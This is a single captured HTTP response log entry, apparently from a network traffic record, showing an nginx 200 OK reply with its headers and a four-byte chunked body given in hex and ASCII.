Dec 10, 2024 07:33:44.799963951 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0